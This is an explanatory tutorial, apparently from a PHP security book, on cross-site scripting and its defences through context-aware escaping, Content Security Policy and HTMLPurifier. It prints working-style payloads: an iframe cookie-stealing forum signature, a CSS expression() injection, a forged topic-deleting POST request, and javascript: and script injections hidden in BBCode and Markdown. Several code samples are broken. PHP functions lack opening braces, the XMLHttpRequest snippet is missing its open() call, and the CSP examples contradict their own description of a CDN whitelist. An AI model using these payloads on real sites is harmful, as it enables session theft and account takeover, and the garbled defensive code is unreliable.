Cross-site scripting (XSS) is perhaps the most widespread type of vulnerability in web applications. According to some statistics, about 65% of sites are vulnerable to XSS in one form or another. That figure should scare you as much as it scares me.

What is Cross Site Scripting?

An XSS attack occurs when an attacker is able to inject a script (usually JavaScript) into the output of a web application and execute it in the client's browser. This is typically done by switching from an HTML data context to a scripting context, most often when new HTML, JavaScript, or CSS markup is injected. HTML offers plenty of places to add an executable script to a page, and browsers provide many ways to do it. Any input to the web application, such as an HTTP request parameter, can be a vehicle for injected code.

One of the problems with XSS is that programmers constantly underestimate it, which is unusual for a vulnerability of this severity. Developers are often unaware of the degree of threat and tend to build defenses on misconceptions and bad practice. This is especially true in PHP, where code is often written by developers without sufficient security knowledge. On top of that, real-world examples of XSS attacks look simple and naive, so programmers who study them assume their own defenses are sufficient simply because nothing obvious gets through. It's not hard to see where those 65% of vulnerable sites come from.

If an attacker can inject JavaScript into a web page and execute it, then he can execute any JavaScript in the user's browser, and that gives him complete control. Indeed, from the browser's point of view, the script came from the web application, which is automatically considered a trusted source.

Therefore, I want to remind you: any data not created by PHP itself for the current request is untrustworthy. This also applies to the browser, which is a separate party from the web application.

The browser trusts everything it receives from the server, and this is one of the main reasons for cross-site scripting. Fortunately, the problem is solvable, which we’ll talk about below.

We can apply this principle even more broadly to the very environment of the JavaScript application in the browser. Client-side JavaScript code ranges from very simple to extremely complex, often a separate client-side web application. Such applications are worth protecting as well as any other. They should not rely on data received from remote sources (including from an application on the server), applying validation and making sure that the content displayed in the DOM is correctly escaped or processed.

Injected scripts can be used for a wide variety of tasks, including:

  • stealing cookies and authorization data,
  • making HTTP requests on behalf of the user,
  • redirecting users to malicious sites,
  • reading and modifying the browser's local storage,
  • performing complex calculations and sending the results to the attacker's server,
  • exploiting the browser and downloading malware,
  • emulating user activity for clickjacking,
  • overwriting or taking control of browser applications,
  • attacking browser extensions,

and so on; the list could be continued indefinitely.

Replacing the interface (UI Redress, clickjacking)

While a distinct attack in its own right, clickjacking is inextricably linked with cross-site scripting, since both rely on similar sets of attack vectors. Sometimes it is difficult to distinguish between the two, because one technique helps the other succeed.

Interface spoofing (UI redress) is any attempt by an attacker to change the user interface of a web application. It allows an attacker to inject new links or new HTML, resize elements, hide or obscure the original interface, and so on. When such an attack is performed to trick the user into clicking an embedded link or button, it is usually referred to as clickjacking.

Most of this chapter focuses on UI redress performed through XSS. However, there are other spoofing techniques that use embedded frames; we'll take a closer look at those in Chapter 4.

Cross-site scripting example

Let’s imagine that an attacker stumbles upon a forum that allows users to display a small caption under their comments. The attacker creates an account, spams all threads within reach, applying the following signature to his messages:

<script>document.write('<iframe src="'
    + encodeURIComponent(document.cookie) + '" height=0 width=0 />');</script>

By some miracle, the forum engine includes this signature in all the spammed topics, and users begin loading the code. The result is obvious: the attacker injects an iframe that renders as a tiny, zero-sized dot at the very bottom of the page, attracting no attention. The browser sends a request for the iframe's content, passing each forum member's cookie values to the attacker's URI as a GET parameter. The attacker can collate them and use them for further attacks. While ordinary members are of little interest, some well-planned trolling will undoubtedly attract the attention of a moderator or administrator, whose cookies can be very useful for gaining administrative access to the forum.

This is a simple example, but it can be extended. Say the attacker wants to know the username associated with the stolen cookies. Easy! It is enough to add code that queries the DOM and includes the name in a username= parameter of the GET request. Or does the attacker need information about the browser to bypass session fingerprinting? It is enough to include the data from navigator.userAgent.

This simple attack has many consequences, such as gaining administrator rights and control over the forum. It is therefore unwise to underestimate the capabilities of an XSS attack.

Of course, the attacker's approach in this example has a flaw. There is an obvious defense: all sensitive cookies are marked with the HttpOnly flag, which prevents JavaScript from accessing them. But you have to remember the basic rule: if an attacker can inject JavaScript, that script can do anything. If the attacker cannot get at the cookies and attack with them, then he will do what all good programmers do: write an effective automated attack.

    var params = 'type=topic&action=delete&id=347';
    var http = new XMLHttpRequest();'POST', '', true);
    // Content-Length and Connection are set automatically by the browser.
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onreadystatechange = function() {
        if (http.readyState == 4 && http.status == 200) {
            // Do something else.
        }
    };
    http.send(params);
The above shows one way to send a POST request that deletes a forum topic. We could make it fire only for a moderator (for example, if the username is displayed somewhere, we can compare it against a list of known moderators, or detect special styles applied to moderator accounts).

As this suggests, HttpOnly cookies are of limited use in protecting against XSS. They block cookie theft, but do not prevent the cookies from being used during an XSS attack. In addition, an attacker who does not want to be detected would prefer not to leave traces in the visible markup that might arouse suspicion.
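The HttpOnly flag itself is set on the server side. A minimal PHP sketch (cookie names and values here are illustrative; the array-options form requires PHP 7.3+):

```php
<?php
// Flag the session cookie HttpOnly (and Secure) before it is issued.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,   // send only over HTTPS
    'httponly' => true,   // hide from JavaScript (document.cookie)
    'samesite' => 'Lax',
]);

// Ordinary cookies take the same flags via setcookie().
setcookie('prefs', 'dark', [
    'expires'  => time() + 86400,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
```

Remember, though, that as the example above demonstrated, HttpOnly only blocks cookie theft; it does not stop an injected script from acting on the user's behalf.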

Types of XSS attacks

XSS attacks can be classified in several ways. One is by how the malicious input reaches the web application: it can be included in the output of the current request, stored and included in the output of a later request, or passed to a JavaScript-based DOM operation. This gives us the following types of attack.

Reflected XSS attack

Here, untrusted input sent to the web application is immediately included in the application's output; that is, it is "reflected" from the server back to the browser within the same request. Reflection occurs in error messages, search results, post previews, and more. This form of attack is usually staged by convincing a user to click a link or submit a form prepared by the attacker. Getting a user to click an untrusted link may require social engineering, a spoofed domain, or a URL-shortening service. Social networks and the shortening services themselves are especially vulnerable to URL spoofing via shortened links, since such links are commonplace on those resources. Be careful and check what you click on!

Stored XSS attack

When the malicious payload is stored somewhere and retrieved as a user views the data, the attack is referred to as stored (or persistent). Besides databases, many other places are suitable for long-term storage, including caches and logs; attacks that inject payloads into logs have already been seen in the wild.

DOM based XSS attack

DOM-based attacks can be reflected or stored; the difference is in where the payload ends up being processed. Most attacks target the markup of the HTML document directly, but HTML can also be modified through JavaScript via the DOM. Content successfully embedded in HTML can later be used in JavaScript DOM operations, and vulnerabilities in JavaScript libraries, or their misuse, are also viable targets.

Cross-site scripting and injection context

An XSS attack succeeds by injecting across contexts. The term "context" describes how browsers interpret the content of an HTML document. Browsers recognize a number of key contexts, including: HTML body, HTML attribute, JavaScript, URL, and CSS.

The attacker’s goal is to take data intended for one of these contexts and force the browser to interpret it in a different context. For example:

<div style="background:<?php echo $colour ?>;">

$colour is populated from a database of user preferences and controls the background color of a text block. The value is inserted into a CSS context, which is a child of an HTML attribute context; that is, we are adding CSS inside a style attribute. Escaping for such a nested context might seem unnecessary, but consider the following example:

$colour = "expression(document.write('<iframe src="
    . "' + encodeURIComponent(document.cookie) + "
    . "' height=0 width=0 />'))";

<div style="background:<?php echo $colour ?>;">

If the attacker successfully injects this value, he can embed a CSS expression() that executes arbitrary JavaScript in Internet Explorer. In other words, he switches out of the current context by injecting a new JavaScript context.

Looking at the previous example, some readers will be reminded of escaping. Let's apply it:

$colour = "expression(document.write('<iframe src="
    . "' + encodeURIComponent(document.cookie) + "
    . "' height=0 width=0 />'))";

<div style="background:<?php echo htmlspecialchars($colour, ENT_QUOTES, 'UTF-8') ?>;">

If you test this in IE, you will quickly find that something very bad is going on: the XSS attack still succeeds, even after escaping $colour with htmlspecialchars()!

That is how important it is to get the context right. Each context requires a different escaping method, because each has its own special characters and its own escaping needs. It is not enough to sprinkle htmlspecialchars() and htmlentities() around and pray that your web application is safe.

What went wrong in the previous example? Browsers always unescape HTML attribute values before interpreting them in any further context, and we ignored the fact that two contexts needed escaping.

We should have escaped $colour for the CSS context first, and only then applied HTML escaping. That would have reduced $colour to a valid string literal with none of the parentheses, quotes, spaces, or other characters that allow an expression() to be embedded. By failing to realize our attribute spans two contexts, we escaped it as if it were just an HTML attribute. Quite a common mistake.

One lesson can be drawn from this situation: context matters. In an XSS attack, the attacker will always try to jump from the current context into another where JavaScript can be executed. If you can identify every context in your HTML output, including how they nest, you are ten steps closer to successfully protecting your web application from XSS.

Let’s take another example:

<a href=""></a>

Ignoring for a moment where untrusted input might appear, this code can be broken down as follows:

  1. There is a URL context, i.e. the value of the href attribute.
  2. There is an HTML attribute context, i.e. the parent of the URL context.
  3. There is an HTML body context, i.e. the text inside the <a> tag.

These are three different contexts, so up to three rounds of escaping may be needed if the data sources are untrusted. In the next section, we'll take a closer look at escaping as a defense against XSS.
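Applied to the anchor example, untrusted data destined for the href must be escaped innermost context first: URL-encode the value, then HTML-escape the whole attribute. A sketch under those rules (the function name and query parameter are mine):

```php
<?php
// Escape for the URL context first, then for the HTML attribute context.
function escapeHref(string $base, string $param): string
    $url = $base . '?q=' . rawurlencode($param);
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');

echo '<a href="' . escapeHref('/search', '"><script>') . '">Search</a>';
```

Reversing the order, or skipping either step, would leave one of the two contexts open to injection.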

Cross-site scripting protection

Protecting against XSS is possible, but the protection must be applied consistently, without exceptions or shortcuts, and preferably from the very beginning of development, while the workflow is still fresh in everyone's mind. Implementing protection at a later stage can be costly.

Input validation

Input validation is only the first line of defense for a web application. At the point where data is received, we cannot predict where and how it will later be used, and for almost all textual data we must still allow users to type quotes, angle brackets, and other special characters.

Validation works best at preventing XSS for data with constrained values. An integer, say, should never contain HTML-special characters; a parameter such as a country name should match a predefined list of real countries; and so on.

Input validation can also police data with a well-defined syntax. For example, a valid URL should begin with http:// or https://, not the far more dangerous javascript: or data: schemes. Essentially, any address derived from untrusted input should be checked for these schemes, because escaping a javascript: or data: URI has the same effect as escaping a legitimate URL: none at all.
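A whitelist check on the URL scheme can be sketched like this (the function name is mine; note that this sketch also rejects relative URLs, which have no scheme):

```php
<?php
// Accept only http and https URLs; reject javascript:, data:, and anything else.
function isSafeUrl(string $url): bool
    $scheme = parse_url(trim($url), PHP_URL_SCHEME);
    return in_array(strtolower((string) $scheme), ['http', 'https'], true);
```

Checking the parsed scheme, rather than matching a string prefix, also catches tricks such as leading whitespace or mixed-case schemes like `JaVaScRiPt:`.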

While input validation cannot block all of the malicious payload in an XSS attack, it can stop the most obvious types of attacks. Input validation was discussed in detail in the second part of the book.

Escaping (as well as encoding)

Escaping output data ensures it cannot be misinterpreted by the receiving parser or interpreter. The obvious examples are the less-than and greater-than signs that delimit HTML tags: if these characters can be inserted from untrusted input, an attacker can inject new tags that the browser will render. They are usually replaced by the sequences &lt; and &gt;.

Escaping preserves the meaning of the data; it simply replaces characters that have special significance with safe alternatives, usually a hexadecimal representation or something more readable, such as HTML entities (where safe to use).

As the discussion of contexts showed, how you escape depends on where the data is being embedded. Escaping for HTML is different from escaping for JavaScript, which in turn is different from escaping for URLs. Using the wrong escaping strategy for a given context renders the protection ineffective and creates a vulnerability for an attacker to exploit.

To make escaping easier, it is recommended to use a dedicated class designed for the purpose. PHP does not provide all the required escaping functionality out of the box, and some of what it does provide is not as secure as most developers think.
Let's take a look at the escaping rules that apply to the most common contexts: HTML body, HTML attributes, JavaScript, URL, and CSS.

Never Inject Data Except in Allowed Locations

Before exploring escaping strategies, make sure your web application's templates do not inject data in the wrong places. By that I mean injecting data into sensitive areas of HTML that let an attacker influence how the markup is parsed, areas that normally would never call for escaping. In the following examples, ... marks the injected data:

<script>...</script>

<!--...-->

<div ...="test"/>

<... href=""/>

<style>...</style>
Each of the locations above is dangerous. Allowing data inside a script tag, outside of a string or numeric literal, lets an attacker inject running JavaScript. Data placed in HTML comments can trigger Internet Explorer conditional comments and other unexpected behavior. The next two locations are more obvious: nobody would let an attacker influence tag or attribute names, that is exactly what we are trying to prevent! Finally, as with scripts, we cannot let attackers inject directly into CSS, as that enables UI redress attacks and script execution through Internet Explorer's expression() function.

Always Escape HTML Before Embedding Data in HTML Body

The HTML body context refers to text content enclosed in tags, for example text between <body>, <div>, or any other paired tags. Data embedded in such content must be HTML-escaped.

HTML escaping is well known in PHP in the form of the htmlspecialchars() function.
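In practice it is worth wrapping htmlspecialchars() so the flags and charset are never forgotten; a minimal sketch (the wrapper name is mine):

```php
<?php
// HTML-body escaping: convert &, <, >, " and ' into entities.
function escapeHtml(string $data): string
    return htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
```

ENT_QUOTES converts both quote styles, and stating the charset explicitly avoids relying on PHP's configured default.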

Always Escape HTML Attributes Before Injecting Data Into Their Context

The HTML attribute context refers to all values assigned to element attributes, with the exception of attributes interpreted by the browser as CDATA. The exception is confusing, but it mainly concerns non-XML HTML standards, where JavaScript can appear unescaped in event attributes. For all other attributes, you have the following two options:

  1. If the attribute value is quoted, then you MAY use HTML escaping.
  2. However, if the value is specified without quotes, then you MUST use HTML attribute escaping.

The second option must also be used when the attribute quoting rules are unclear. For example, HTML5 considers unquoted attribute values perfectly acceptable, and there are plenty of examples of this clever approach in real projects. When in doubt, proceed with caution.
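HTML attribute escaping is stricter than htmlspecialchars(): every character outside [A-Za-z0-9] becomes a numeric entity, so even an unquoted attribute cannot be broken out of. A rough ASCII-only sketch (the function name is mine; a real implementation must also handle multibyte input):

```php
<?php
// Replace everything except ASCII letters and digits with a hex entity.
function escapeHtmlAttr(string $data): string
    return preg_replace_callback('/[^a-zA-Z0-9]/', function (array $m) {
        return sprintf('&#x%02X;', ord($m[0]));
    }, $data);
```

With this escaping, even a payload like `" onmouseover="alert(1)` cannot terminate the attribute, because the quote and the spaces are all entity-encoded.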

Always JavaScript-Escape Before Injecting Data into JavaScript Data Values

JavaScript data values are mostly strings. Since numbers cannot be escaped, there is an additional rule: always validate that numbers really are numbers …
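A sketch of both halves of that rule, with hypothetical function names (ASCII-only; a production escaper must handle multibyte data):

```php
<?php
// Strings headed for a JavaScript literal: \xHH-escape all non-alphanumerics.
function escapeJs(string $data): string
    return preg_replace_callback('/[^a-zA-Z0-9]/', function (array $m) {
        return sprintf('\\x%02X', ord($m[0]));
    }, $data);

// Numbers cannot be escaped, only validated.
function assertNumber($value): float
    if (!is_numeric($value)) {
        throw new InvalidArgumentException('Not a number');
    }
    return (float) $value;
```

Escaping this aggressively means even `</script>` inside a string literal cannot terminate the surrounding script block.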

Content Security Policy

A key element in all this cross-site scripting talk is that the browser unquestioningly runs any JavaScript it receives from the server, regardless of how the code got there. On receiving an HTML document, the browser has no way of knowing which of the embedded resources are safe and which are not. What if we could change that?

Content Security Policy (CSP) is an HTTP header that declares a whitelist of resource sources the browser may trust. Any source not on the list is considered untrusted and simply ignored. Consider the following:

X-Content-Security-Policy: script-src 'self'

This CSP header tells the browser to trust only JavaScript source URLs pointing to the current domain. The browser will load scripts from this source and completely ignore all others, so a script from any other domain won't load even if an attacker manages to inject a reference to it. All inline scripts, such as <script> tags and javascript: URIs, will also be ignored.

If we need to use JavaScript from a source other than our own, we can whitelist it. For example, let's add the jQuery CDN:

X-Content-Security-Policy: script-src 'self'

Other resource directives can be added, such as one for CSS stylesheets, by separating the directives with semicolons and listing the allowed addresses for each:

X-Content-Security-Policy: script-src 'self'; style-src 'self'

The header value format is simple: a directive such as script-src, followed by a space-separated list of sources that make up the whitelist. A source can be a quoted keyword such as 'self' or a URL, and URLs are matched against the resources actually being loaded. Listing an exact host means scripts will load only from that host and from none of the unlisted domains. To allow all subdomains of a host you can use a wildcard, such as *; the same matching rules extend to local paths, ports, URL schemes, and so on.

The essence of the CSP whitelist is simple: if you define a source list for a resource type, anything not on the list will not be loaded. If you don't define a list for a resource type, the browser falls back to the default-src directive, and if that is absent too, all sources are allowed for that type.

The following resource directives are supported:

  • connect-src: limits the sources you may connect to via XMLHttpRequest, WebSockets, and so on.
  • font-src: limits sources for web fonts.
  • frame-src: limits URLs for frames.
  • img-src: limits image sources.
  • media-src: limits video and audio sources.
  • object-src: limits sources for Flash and other plugins.
  • script-src: limits sources for scripts.
  • style-src: limits sources for CSS stylesheets.

To set a safe default, there is a special directive, default-src, which defines the initial whitelist for all of the listed categories at once.

X-Content-Security-Policy: default-src 'self'; script-src 'self'

This restricts all resources to the current domain but adds an exception to script-src for the jQuery CDN. This usage immediately closes off all untrusted sources and allows only those explicitly known to be needed.

In addition to URLs, allowed sources can be assigned the following keywords, which must be enclosed in single quotes:

'none' 'self' 'unsafe-inline' 'unsafe-eval'

Did you notice the word unsafe? The best way to use CSP is to deny attackers exactly what they rely on. Do they want to inject inline scripts and resources? Then if we avoid inline content ourselves, our web applications can tell browsers to ignore all inline content without exception: external script files and addEventListener() instead of event attributes. But surely, since it's our own rule, we can allow ourselves a few useful exceptions, right? Wrong. Forget about exceptions. Including the 'unsafe-inline' option defeats the very purpose of CSP.

The 'none' keyword means exactly that: nothing. Setting it as a resource source makes the browser ignore all resources of that type. It will cause you some minor inconvenience, but I suggest starting from something like the following example, so that your CSP whitelist always contains only what it explicitly allows:

X-Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'

One last caveat: since CSP is a new mechanism, you will need to duplicate the policy in an X-WebKit-CSP header to make sure WebKit-based browsers such as Safari and Chrome understand it too. A gift to you from WebKit.

X-Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'
X-WebKit-CSP: default-src 'none'; script-src 'self'; style-src 'self'
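From PHP, these headers are sent with header() before any output is produced. A small sketch (the helper name is mine; header() is a no-op on the CLI but sends the headers under a web SAPI):

```php
<?php
// Build both header lines for a given policy string.
function cspHeaders(string $policy): array
    return [
        'X-Content-Security-Policy: ' . $policy,
        'X-WebKit-CSP: ' . $policy,
    ];

$policy = "default-src 'none'; script-src 'self'; style-src 'self'";
foreach (cspHeaders($policy) as $line) {
    header($line);
}
```

Keeping the policy in one string guarantees the duplicated headers never drift apart.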

Defining the user’s browser

HTML cleanup

Sooner or later a web application faces the need to include externally determined HTML in its pages without escaping it. Obvious examples include quoted forum posts, blog comments, editing forms, and posts from RSS or Atom feeds. Escaping such data would corrupt the very markup it is meant to render, so instead we must carefully filter it to make sure every dangerous element is eliminated.

Did you notice that I wrote about HTML "externally determined" rather than "externally supplied"? Many web applications let users write in alternatives to HTML markup, such as BBCode, Markdown, or Textile. A common mistake in PHP circles is to think these markup languages prevent XSS attacks. Complete nonsense. Their purpose is to make rich text easier for users to produce without writing HTML, not to provide security. Not everyone knows HTML, and the language has drifted from its SGML roots; hand-writing long blocks of rich text in HTML is slow and painful.

The HTML from such input is generated on the server, which implies a level of trust, and that trust is exactly the common mistake. The resulting HTML is still externally determined, and we cannot consider it safe. This is even more obvious with a blog feed, whose posts are already full HTML before they are syndicated.

Consider the following piece of code:

[url=javascript:alert('I can haz Cookie?\n'+document.cookie)]Free Bitcoins Here![/url]

BBCode restricts the available HTML by default, but it does not provide absolute protection. For example, many BBCode implementations fail to restrict the [url] tag to HTTP URLs and will let a javascript: URI straight through. Markdown is another good example:

I am a Markdown paragraph.<script>document.write('<iframe src="' + encodeURIComponent(document.cookie) + '" height=0 width=0 />');</script>

There’s no need to panic. I swear I am just plain text!

Markdown is a popular alternative to writing raw HTML, but it also lets authors mix HTML into their Markdown, and Markdown generators pass the embedded XSS payload straight through.

Obviously, we need to apply HTML sanitisation, regardless of the markup type, to anything we include in the application's output after generation and other operations are complete. No exceptions: input remains untrusted until we have processed it and made sure it is safe.

HTML sanitisation is a laborious process of parsing the input and applying a whitelist of allowed elements, attributes, and other details. It is not for the faint of heart, it is extremely easy to get wrong, and PHP suffers from a number of insecure libraries whose authors claim to do it all correctly. So do not pick a fashionable solution, and do not write your own.

The only PHP library I know of that actually produces secure HTML is HTMLPurifier. It is actively maintained, well tested, and I highly recommend it. HTMLPurifier is quite simple to work with; essentially you only need to set the allowed elements:

// Basic setup without a cache
$config = HTMLPurifier_Config::createDefault();
$config->set('Core.Encoding', 'UTF-8');
$config->set('HTML.Doctype', 'HTML 4.01 Transitional');
// Create the whitelist
$config->set('HTML.Allowed', 'p,b,a[href],i'); // basic formatting and links
$sanitiser = new HTMLPurifier($config);
$output = $sanitiser->purify($untrustedHtml);

Don't use other libraries as HTML sanitisers unless you are absolutely sure of what you're doing.